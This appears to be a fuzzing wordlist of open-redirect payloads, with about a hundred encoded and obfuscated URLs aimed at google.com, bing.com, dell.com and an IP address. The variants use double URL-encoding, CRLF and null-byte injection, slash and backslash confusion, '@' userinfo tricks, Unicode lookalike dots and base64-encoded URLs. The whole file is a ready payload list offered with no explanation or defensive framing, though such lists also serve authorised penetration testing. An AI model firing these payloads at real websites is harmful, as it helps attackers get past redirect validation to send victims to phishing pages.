%2Fgoogle.com
%2F%2Fgoogle.com%2F%2F
%2egoogle.com
%25%32%65google.com
%252e.google.com
[.google.com
.bing.com
&bing.com
//google.com
//google%00.com    
/\google.com
/\/google.com
/\/\google.com
<>//google.com
/<>//google.com
\/\/google.com/%09/google.com
/%5cgoogle.com
//www.google.com/%2f%2e%2e
//www.google.com/%2e%2e
//google.com/
//google.com/%2f..
//\google.com
/\targetedsite.com:80%40google.com
//google.com
https:google.com
//google%E3%80%82com
/@google.com
@%E2%80%AE@bing.com   
//yahoo.com/%2F..
//google%00.com
@google.com/      
//;@google.com
+@google.com/
//%0d%0ahttps://google.com/
%0dgoogle.com
/%0d%0ahttps://google.com/     
////216.58.214.206
///216.58.214.206
//216.58.214.206
/\216.58.214.206
/216.58.214.206
+@216.58.214.206
%2F%2F%2F%2Fhackerone.com
//;@google.com
///;@google.com
/////google.com/
/////google.com
/%0d/google
////\;@google.com
////google.com//
////google.com/
////google.com
///\;@google.com
///google.com//
///google.com/
///google.com
//\/google.com/
//\google.com
//google.com//
//google.com/
//google.com
/.google.com
../google.com
https://bing.com%EF%BC%
https:///\google.com
@/bing@
?url=https:www.bing.com
/\/\/google.com/
/\/google.com/
/\/google.com
/\google.com
\\google.com/@
//google.com\@
https://\///\\/\google.com
hTTp%3a%2f%2f%dell.com%2f
HtTp://bing.com
Https://bing.com
Https%3a%2f%2f%dell.com%2f
hTTp://dell.com
http://http://bing.com
http://bing.com/http://bing.com
hthttp://tp://bing.com
https:\\google.com
https://bing.com
http:\\bing.com
http:///bing.com
https:/\google.com
/〱google.com
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
http://google。com
%00https://bing.com
//google。com
//#//google.com/
//%09/google.com
//google.com/..;/css
/%2Fgoogle%252Ecom
//https://evil[.]com
%68%74%74%70%73%3a%2f%2f%77%77%77%2e%64%65%6c%6c%2e%63%6f%6d%2f
%68%74%74%70%3a%2f%2fbing.com
%2568%2574%2574%2570%253a%252f%252fbing.com
%25%36%38%25%37%34%25%37%34%25%37%30%25%37%33%25%33%61%25%32%66%25%32%66%25%36%34%25%36%35%25%36%63%25%36%63%25%32%65%25%36%33%25%36%66%25%36%64%25%32%66
aHR0cHM6Ly9kZWxsLmNvbS8=
aHR0cHM6Ly9kZWxsLmNvbQ==
c058aec404eabd4ba03e3acc27b1c350
https://www.dell.com&hash=c058aec404eabd4ba03e3acc27b1c350
